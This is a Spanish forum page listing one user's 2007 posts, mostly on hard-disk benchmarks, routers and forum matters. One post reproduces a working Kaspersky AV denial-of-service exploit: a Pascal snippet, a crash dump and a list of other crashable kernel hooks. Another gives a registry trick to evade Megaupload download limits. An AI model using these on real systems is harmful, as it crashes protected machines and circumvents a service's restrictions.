elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
22 Agosto 2008, 02:43  



  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16] 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ... 88
226  Informática / Hardware / Re: Benchmark - Test de velicidad a discos duros en: 16 Junio 2007, 03:24
Respecto a la temperatura tan baja (26ºC aunque suele estar a 24ºC normalmente) te muestro una captura de las medidas del resto de sensores de la placa:




En ese equipo tengo 3 discos duros:
HD ATA Maxtor DiamondMax Plus 9 Modelo: 6Y120L0 120 GB 7.200 rpm 2MB de caché

Cada uno de ellos con este disipador de aluminio y dos ventiladores de 5.000rpm incorporados (HDD Cooler de Sharkoon):

Cuestan unos 5€ y su consumo es de 1.44W. A pesar de que la tolerancia de temperaturas de los HDs es alta; al mantenerlos a temperaturas bajas te aseguras de que sus componentes metálicos dilatan menos y esto disminuye la probabilidad de errores (claro que un mal golpe a la CPU mientras escriben los discos y tirarías por tierra todo).
227  Forums Generales / Dudas Generales / Re: Lista de Correo de elhacker.net (Boletín mensual) en: 15 Junio 2007, 07:07
Claro que vive ingenioso77 :)

Actualmente la lista de correo tiene 6.200 miembros a los que nos llega cada mes aproximadamente o cada menos tiempo si esta muy cargada de cosas interesantes. Puedes suscribirte en:

http://www.elistas.net/lista/elhackernet

Un saludo.
228  Seguridad Informática / Bugs y Exploits / [UP] Exploit Kaspersky AV 6.0 y 7.0 en: 15 Junio 2007, 03:39
El antivirus Kaspersky, desde hace muchísimo tiempo sufre una vulnerabilidad bastante peligrosa, que permite hacer un crash del sistema protegido por este antivirus, incluso desde la cuenta de invitado. Todos los intentos de avisar a Kaspersky Lab sobre esta vulnerabilidad han sido ignorados. Este material fue hecho público varios años atras (desde el 2005 me consta), y en el ultimo verano publicaron un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y después de todo este tiempo, nada ha cambiado. Aún ahora con la nueva versión de Kaspersky AV 7.0 este exploit sigue funcionando muy bien.

El objetivo principal de este exploit es hacer una llamada a NtOpenProcess con parámetros inválidos. Esta función esta hookeada por el driver de Kaspersky llamado klif.sys y la razón para el hook es obia (Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esta es una practica muy usada por diferentes tipos de rootkits y malware)

Este es el prototipo de la función:
Código:
NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
               IN ACCESS_MASK DesiredAccess,
               IN POBJECT_ATTRIBUTES ObjectAttributes,
               IN PCLIENT_ID ClientId OPTIONAL );

Y este es un pequeño exploit escrito en Pascal:
Código:
var
  ob1: OBJECT_ATTRIBUTES;
  p1: DWORD;
begin
  ob1.Length := sizeof(ob1);
  NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;
Verificado en el driver klif.sys de la versión 6.12.10.280 y debe funcionar también en las anteriores.

Como se observa en el código,  el ultimo parámetro es la dirección de la estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la memoria del kernel.

Si lanzamos el exploit en una instalación limpia de Windows XP, sin Kaspersky AV, no hay BSOD(Blue Screen Of Death o Pantallazo Azul de Windows).

Si lanzamos el exploit en un Windows XP protegido por Kapersky AV 7.0 inmediatamente obtenemos un pantallazo azul con el mensaje  PAGE_FAULT_IN_NONPAGED_AREA.

Te preguntarás ¿porque ocurre esto? la respuesta es muy sencilla. Supongo que el código fuente de el hook en NtOpenProcess es algo similar a esto:
Código:
NTSTATUS NewNtOpenProcess (
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId OPTIONAL)
{
    __try
   {

     if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;

    else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
                                  ObjectAttributes, ClientId);
   __except (EXCEPTION_EXECUTE_HANDLER)
   {
      ... stuff here ...
   }
}

El gran error aquí es ClientId->UniqueProcess, ya que ClientId es un PUNTERO a una estructura. El hecho de acceder a una región invalida de memoria produce inmediatamente un pantallazo azul con el mensaje PAGE_FAULT_IN_NONPAGED_AREA.

El exploit original creado por Ms-Rem en el 2005 consiste en lo siguiente:
Código:
NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);

Ahora como podrás observar, los desarrolladores de Kaspersky AV han usado un bloque try/except, y parece que desconocen otras funciones de handling. Esperemos que descubran el fabuloso programa llamado NtCall y corrijan su bug:
Código:
******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from f941b39a to f941840c

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND: kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

SYMBOL_STACK_INDEX: 0

FOLLOWUP_NAME: MachineOwner

IMAGE_NAME: klif.sys

SYMBOL_NAME: klif+1940c

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner

Algunos descubrimientos hechos por UG North muestran que hay otras funciones que también están hookeadas por klif.sys las cuales pueden ser explotadas con ataques similares.

Lista de entradas en la SSDT (System Service Descriptor Table) explotables (Windows XP con Kapersky AV 7.0.0.55):
Citar

==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================

Cualquier llamada a esas funciones con parámetros invalidos, llevara a un BSOD.

Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para KAV 5.0

Como  demuestra este exploit, funciona para todas la versiones de Kaspersky Antivirus incluyendo la nueva versión Kaspersky AV 7.0.

¿Realmente aún crees que estas protegido?   :xD

Mensaje originalmente en inglés de  EP_X0FF y UG North:
http://forum.sysinternals.com/forum_posts.asp?TID=10991&PID=49017#49017
229  Comunicaciones / Redes / Re: Router WiFi Slurpr con balanceo de carga entre 6 conexiones en: 14 Junio 2007, 23:04
jajaj no hombre, es que lo puse en el foro de seguridadwireless.net y como no lo habia visto aquí lo corté y pegué jajaj borralo si quieres para que no esté tantas veces
230  Informática / Hardware / Benchmark - Test de velocidad a discos duros en: 14 Junio 2007, 22:48
Ranking elhacker.net Test Discos Duros

SATA I y II

Top 1 - jath_83  112MB/S Raid 0 SATAII (1x WD 320GB, 1x Barracuda 320GB)

Top 2 - hakais  103MB/S Raid 0 SATAII

Top 3 - Artikbot  100'2MB/S Raid 0 SATAII (2x Barracuda 160GB)


Top 4 - Nakp  85'7 Seagate ST3250410AS 500GB

Top 5 - Kasswed  85MB/S WD Raptor 150GB SATAI

Top 6 - el-brujo  84MB/S WD Raptor 150GB SATAI

Top 6 - el-brujo  84MB/S WD Raptor 150GB SATAI

Top 7 - Artikbot  82'4MB/S ST3250820AS (250 GB)

Top 8 - carli15  76MB/S ST3250820AS (250 GB)

Top 9 - duraace  70MB/S Samsung SP2504C 250GB SATAII (funcionando como SATAI

Top 10 - j4k3r  69MB/S SEAGATE BARRACUDA 120GB

Top 11 - NYU  67MB/S ST3250823AS 250GB

Top 12 - <kefren>  64MB/S SATA Seagate ST3500841AS 500GB

Top 13 - marlon_agz  62MB/S HDT722516DLAT80  de 160 Gb

Top 14 - born2kill  59MB/S Samsung HD080HJ SATA-II 7200rpm

Top 15 - xpinete  57MB/S Seagate ST3120827AS 120GB SATA


IDE (ATA)

Top 1 - duraace  75mb/s Maxtor STM3250820A

Top 2 - el-brujo  69mb/s Maxtor MaxLine III 250GB

Top 3 - Kasswed  65,3mb/s Maxtor 6L160P0 160GB ATA Buffer 8MB

Top 4 - .hack//  57MB/S Maxtor 6E040L0 40GB

Top 5 - Cobac  55MB/S Seagate Barracuda ST3160023A (160GB)


Pendrives

Top 1 - ANELKAOS  27.6mb/s USB 2.0 Panasonic 32GB

Top 2 - Neobius  20mb/s SanDisk U3 Cruzer Micro 4GB

Top 3 - NetVicious  19mb/s Kingston DataTraveler Elite 1GB

Top 4 - ANELKAOS  16mb/s USB 2.0 Kingston DataTraveler ReadyFlash DTR/2GB

Top 5 - ANELKAOS  11,5MB/S KPendrive USB 2.0 Trascend JF V30 4GB

Top 6 - .hack//  9,5MB/S KingstonDataTraveler 2.0 de 256MB

Top 7 - Ing_Amc  9MB/S Kingston Data Traveler 2GB USB 2.0

Top 8 - el-brujo  8,6MB/S Kingston Data Traveler 1GB USB 2.0




Actualmente, en mi opinión,  el mayor cuello de botella de un PC se encuentra en los discos duros por lo que en elegirlo bien radica la diferencia entre un equipo rápido y otro que lo podría ser mas, sabiendo elegir. Podéis poner capturas de los test a vuestros discos, indicando:

- Tipo de bus (PATA, SATA, SATAII, SCSI)
- Marca(Western Digital, Maxtor, Seagate, Samsung, Toshiba, etc)
- Modelo
- MB de Caché
- GB de Capacidad.

A ver quien gana! jeje  :)

Las Benchmark las podéis hacer con este programa:

http://www.hdtune.com/hdtune_253.exe

Por si alguien no quiere instalar el HD Tune se puede ejecutar el exe y marchando:

http://www.hdtune.com/hdtune_253.zip

Es compatible con Windows 2000, Windows XP, Windows XP 64-bit, Windows 2003 Server y Windows Vista


HD ATA Maxtor DiamondMax Plus 9 Modelo: 6Y120L0 120 GB 7.200 rpm 2MB de caché

http://www.seagate.com/ww/v/index.jsp?vgnextoid=cfb8ec70fce8f010VgnVCM100000dd04090aRCRD&locale=en-US



HD externo USB 2.0 Western Digital  My Book Essential Edition Modelo:WDG1U3200  320 GB 7.200 rpm 8MB de caché

http://www.wdc.com/sp/products/Products.asp?DriveID=219

Ups, se me olvidó comentar que el teste a este disco duro la hice a través de un USB 1.1. La repetiré sobre USB 2.0 a ver cuanto mejora :)



USB 2.0 Kingston DataTraveler ReadyFlash DTR/2GB




Dentro de unos días volveré a montar varios HD Maxtor en RAID0. Vereis la diferencia ;)
231  Comunicaciones / Redes / Router WiFi Slurpr con balanceo de carga entre 6 conexiones en: 13 Junio 2007, 04:02




Especificaciones:
CPU MIPS 32 4Kc based 266MHz (BIOS adjustable from 200 to 400MHz) embedded processor
Memory 64MB DDR onboard memory chip
Root loader RouterBOOT, 1Mbit Flash chip
Data storage 128MB onboard NAND memory chip
CompactFlash type I/II slot (also supports IBM/Hitachi Microdrive)
Ethernet ports One IDT Korina 10/100 Mbit/s Fast Ethernet port supporting Auto-MDI/X, eight VIA VT6105 10/100 Mbit/s Fast Ethernet ports supporting Auto-MDI/X
MiniPCI slot Six MiniPCI Type IIIA/IIIB slots
Serial ports One DB9 RS232C asynchronous serial port
http://www.routerboard.com/rb500.html

Las PCMCIA que le ha puesto son estas con chipset Atheros:
http://www.engeniustech.com/datacom/products/details.aspx?id=162

Otros routers que pueden hacer lo mismo por conexión de cable  y  dos conexiones son:

Netgear FVS124G
Xincom XC-DPG402
Xincom XC-DPG502
Xincom XC-DPG602
OvisLink MN200
HotBrick Firewall VPN 600/2
HotBrick Firewall VPN 1200/2
ZyXEL ZyWALL 35
ZyXEL ZyWALL 70
Linksys RV082
Linksys RV016
Linksys RV042
Edimax BR-6104K
Xterasys XR-4106
Pheenet BIG-02/4
Symantec VPN 200
Nexland Pro800
BroDigit NFR3024
Hawking FR24

También podemos hacer esto con cualquier Windows Server por soft si disponemos de varias tarjetas de red pero ralentiza bastante la maquina. En linux la verdad es que nunca he hecho balanceo de carga entre varias conexiones.

232  Seguridad Informática / Hacking Básico / Re: Password BIOS en: 12 Junio 2007, 19:27
Contraseñas por defecto en las BIOS ROUTERS y WPA de FON
http://foro.elhacker.net/index.php/topic,99273.0.html
233  Seguridad Informática / Hacking Avanzado / Re: Inyectar dll en iexplorer.exe en: 12 Junio 2007, 12:09
Paper: Inyecciones Dll
http://foro.elhacker.net/index.php/topic,159111.0.html
234  Forums Generales / Foro Libre / Re: E-zine de Isirius Nº1 en: 11 Junio 2007, 16:36
Aquí todo el mundo da la cara y de irresponsable poco querido H4RR13R. Se lo he explicado a Isirius mas de una vez,. Hay otras e-zines y ninguna es oficial por lo que el nombre de elhacker.net  sobra :P Lo debatimos en el staff y se decidió que no era oficial porque, entre otros motivos, ya tenemos un boletín mensual en el que metemos todos los artículos, productos, eventos y noticias interesantes relacionadas con el foro. Simplemente no se pierde tiempo en maquetar, corregir, poner bonito, etc un PDF. Se envia en HTML puro y duro con los links interesantes a mas de 6.100 personas actualmente.

¿Quereis publicar artículos interesantes? Publicadlos en el foro y saldrán en este boletín :)

Lista de Correo de elhacker.net (Boletín mensual)
http://foro.elhacker.net/index.php/topic,16717.0.html

Subscribete :)
http://www.elistas.net/lista/elhackernet

Es la última vez que explico este tema por que ya van unas cuantas....dudas, sugerencias, improperios y blasfemias a mi correo  :D
235  Seguridad Informática / Hacking Básico / Re: Hackers extorsionando? en: 10 Junio 2007, 21:38
NO LES PAGUES NI 0,1€ son dos niñatos aburridos jajaja mira su web:

Código:
http://www.hackdevel.com.ar/
<--OFFLINE :P

236  Seguridad Informática / Seguridad / Re: urgente ayudenme en: 05 Junio 2007, 08:56
[Vacuna] Virus/Gusano Messenger envia adjunto supuestas Fotos--> Fotos_posse.zip
https://foro.elhacker.net/index.php/topic,165397.0.html
237  Forums Generales / Foro Libre / Re: Filtro Porno. en: 03 Junio 2007, 05:16
Ya existe, con ISA Server puedes hacerlo.
238  Seguridad Informática / Seguridad / Re: Una duda que eh tenido siempre... en: 03 Junio 2007, 04:56
Inicio> Panel de control > Opciones de carpeta > pestaña Ver y desmarcando en Configuración avanzada: el checkbox de:
Ocultar las extensiones de archivos para tipos de archivos conocidos

Independientemente de esto, con una cuenta de usuario restringido mitigas prácticamente el total de los virus que se propagan via MSN. Son virus  muy cutres :P
239  Seguridad Informática / Hacking Básico / Re: ayuda con comando at! en: 03 Junio 2007, 04:48
Citar
at /?

Debes meter el path completo, por ejemplo:
Citar
at 17:46 C:\WINDOWS\regedit.exe
240  Seguridad Informática / Hacking Avanzado / Re: Como ganar una cuenta premium en megaupload "legalmente" en: 03 Junio 2007, 01:13
Creando un nuevo valor alfanumérico en:

Código:
HKLM\SOFTWARE\Mi crosoft\Windows\CurrentVersion \Internet Settings\5.0\User Agent\Post Platform

Llamado "Alexa Toolbar" y sin ningún valor podremos descargar sin límite suplantando el valor de registro que crea la barra de Alexa al ser instalada.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16] 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ... 88




Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC